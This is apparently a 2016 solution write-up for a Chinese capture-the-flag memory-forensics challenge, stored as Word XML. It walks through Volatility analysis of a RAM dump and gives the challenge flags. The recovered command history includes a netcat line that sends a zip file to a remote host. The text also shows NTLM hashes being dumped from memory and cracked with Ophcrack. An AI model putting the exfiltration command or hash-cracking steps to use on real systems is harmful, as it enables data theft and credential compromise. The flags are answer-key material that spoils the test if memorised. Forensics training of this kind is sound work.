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0" w:name="OLE_LINK4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>初步分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="4057015"/>
            <wp:effectExtent l="0" t="0" r="5715" b="635"/>
            <wp:docPr id="2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5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ind w:left="0" w:leftChars="0"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使用Volatility的imageinfo插件和notepad插件分析提取数据并解码得到flag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经过网上查找资料发现这这种raw文件是内存取证工具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"https://www.aldeid.com/wiki/Dumpit"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Dumpit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提取内存生成的内存转储文件，可以使用类似Volatility等内存取证分析工具进行取证分析。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在使用Volatility进行内存取证分析第一步便是使用imageinfo插件获取到基本信息，特别是内存数据是什么操作系统下生成的，这点尤为重要，因为在接下来每一步都要命令“--profile”指定操作系统的属性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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1135" cy="2922270"/>
            <wp:effectExtent l="0" t="0" r="5715" b="11430"/>
            <wp:docPr id="2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22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根据上图可知系统为32位的windows xp sp2，所以指定系统属性命令为“--profile=WinXPSP2x86”， 根据题意，推测小黑在使用笔记本编写文本，所以接下来使用notepad插件列出当前显示的记事本文本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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71135" cy="2421255"/>
            <wp:effectExtent l="0" t="0" r="5715" b="17145"/>
            <wp:docPr id="2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21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在获得文本内容为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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666C61677B57336C6563306D655F376F5F466F72336E356963737D</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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使用hash-identifier简单识别：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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7325" cy="2630805"/>
            <wp:effectExtent l="0" t="0" r="9525" b="17145"/>
            <wp:docPr id="2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0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发现不是散列值，分析文本内容，有数字0~9，有字母A~F，有可能是base编码，经过多次尝试发现是base16编码：（选手还可能走入进行hex转string等误区）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3138805"/>
            <wp:effectExtent l="0" t="0" r="4445" b="4445"/>
            <wp:docPr id="2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13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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>得到flag为flag{W3lec0me_7o_For3n5ics}。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3、使用Volatility的hashdump插件获取NTML hash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根据题意，熟悉Volatility的使用以及插件功能，发现hashdump可以将内存中的NTML提取出来：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="1141095"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1905"/>
            <wp:docPr id="3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2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141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通过网上查阅资料发现NTML hash的算法原理以及破解方法，可以找到基于彩虹表在线NTML hash破解器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"http://www.objectif-securite.ch/en/ophcrack.php"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Ophcrack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，原理通过使用预先完成的计算结果及存储的彩虹表来加速破解hash。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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9230" cy="1579245"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1905"/>
            <wp:docPr id="31" name="图片 31" descr="QQ截图201611141856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 descr="QQ截图201611141856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所以得出第二小题flag：flag{19950101}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2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3、综合使用工具进行取证分析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根据题意，小黑在发送文件，那么一定向外建立了连接，于是便使用connscan插件（tcp连接池扫描插件）。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1245235"/>
            <wp:effectExtent l="0" t="0" r="4445" b="12065"/>
            <wp:docPr id="32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2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45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Chars="200"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可以看到本机192.168.57.21的1045与远程主机192.168.57.14的2333端口建立了连接，并且进程号为120，于是使用psscan插件（进程池扫描插件）获取跟多信息：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="3348990"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3810"/>
            <wp:docPr id="37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48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跟踪进程号120发现是使用的是nc，同时也看到了cmd的进程，基本可以确定是使用cmd命令行的nc进行文件的传输，于是使用cmdscan插件（通过扫描_COMMAND_HISTORY提取命令历史记录）获取更多的信息：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/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3124835"/>
            <wp:effectExtent l="0" t="0" r="6350" b="18415"/>
            <wp:docPr id="38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2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24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由上图小黑使用了一些命令：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Cmd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#0 @ 0x56af00: ipconfig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210" w:lineRule="atLeast"/>
        <w:ind w:left="676" w:right="0" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="5C5C5C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Cmd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8F8F8"/>
        </w:rPr>
        <w:t>#1 @ 0x56d650: cd C:\Program Files\Netcat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0" w:lineRule="atLeast"/>
        <w:ind w:left="676" w:right="0" w:hanging="360"/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Cmd </w:t>
      </w:r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#2 @ 0x2da2e40: nc 192.168.57.14 2333 &lt; </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="OLE_LINK9"/>
      <w:r>
        <w:rPr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sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>P@ssW0rd_is_y0ur_bir7hd4y.zip</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/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18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>  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所以小黑是使用nc向远程主机192.168.57.14的2333发送了P@ssW0rd_is_y0ur_bir7hd4y.zip文件。 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之后便可以memdump插件（转储进程的可寻址内存数据插件）导出使用nc发送的相关数据：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1770" cy="840740"/>
            <wp:effectExtent l="0" t="0" r="5080" b="16510"/>
            <wp:docPr id="41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3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840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预计很多选手会使dumpfiles插件（提取内存映射和缓存文件插件），但是在这里使用这个插件是不能提取出相应的文件的，估计很多选手会卡在这里。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接下来分析得到的120.dmp转储文件：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4190365" cy="1238250"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="4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3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3040" cy="2502535"/>
            <wp:effectExtent l="0" t="0" r="3810" b="12065"/>
            <wp:docPr id="44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3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5025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由上图可知发送P@ssW0rd_is_y0ur_bir7hd4y.zip文件里包含了一个P@ssW0rd_is_y0ur_bir7hd4y.txt文件，由于转储文件里包含了多个文件，便使用foremost工具自动分割包含的文件：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1770" cy="1741170"/>
            <wp:effectExtent l="0" t="0" r="5080" b="11430"/>
            <wp:docPr id="45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得到了6个zip压缩包文件，于是到相应的目录查看：</w:t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2278380"/>
            <wp:effectExtent l="0" t="0" r="5080" b="7620"/>
            <wp:docPr id="47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3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line="400" w:lineRule="exact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根据大小可以相同可以推测发送多次相同的压缩包，尝试对第一个压缩包00000316.zip解压发现需要密码：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1770" cy="1543050"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="50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3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根据压缩文件里面的提示生日的信息，可以推测出密码为19950101，当然也可以暴力破解的方式秒破密码：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1135" cy="2675255"/>
            <wp:effectExtent l="0" t="0" r="5715" b="10795"/>
            <wp:docPr id="51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4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675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得到密码解压文件得到flag：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="1883410"/>
            <wp:effectExtent l="0" t="0" r="3175" b="2540"/>
            <wp:docPr id="52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83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得到第三小题flag：flag{Thi5_Is_s3cr3t!}。</w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:bookmarkEnd w:id="0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dobeSongStd-Light">
    <w:altName w:val="黑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Garamond">
    <w:altName w:val="Segoe Print"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000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enQuanYi Micro Hei">
    <w:altName w:val="宋体"/>
    <w:panose1 w:val="020B0606030804020204"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00800036" w:usb3="00000000" w:csb0="603E019F" w:csb1="DFD70000"/>
  </w:font>
  <w:font w:name="Andale Mono">
    <w:altName w:val="MV Boli"/>
    <w:panose1 w:val="020B0509000000000004"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000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DejaV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altName w:val="Segoe Print"/>
    <w:panose1 w:val="00000500000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="WenQuanYi Zen Hei">
    <w:altName w:val="宋体"/>
    <w:panose1 w:val="02000603000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000036" w:usb3="00000000" w:csb0="603E000D" w:csb1="D2D70000"/>
  </w:font>
  <w:font w:name="Cantarell">
    <w:altName w:val="MV Boli"/>
    <w:panose1 w:val="02000503000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000105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Vijaya">
    <w:altName w:val="Segoe Print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  <w:font w:name="Traditional Arabic">
    <w:altName w:val="Times New Roman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Fixedsys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nux Liberti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29A2F2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5829A2F2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2A1291"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="582A129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2774E9"/>
    <w:rsid w:val="27615078"/>
    <w:rsid w:val="35F32A90"/>
    <w:rsid w:val="56230A8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400" w:lineRule="atLeast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uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:spacing w:before="60" w:line="288" w:lineRule="auto"/>
      <w:ind w:firstLine="510"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="4">
    <w:name w:val="Hyperlink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</dc:creator>
  <cp:lastModifiedBy>L</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-14T20:16:40Z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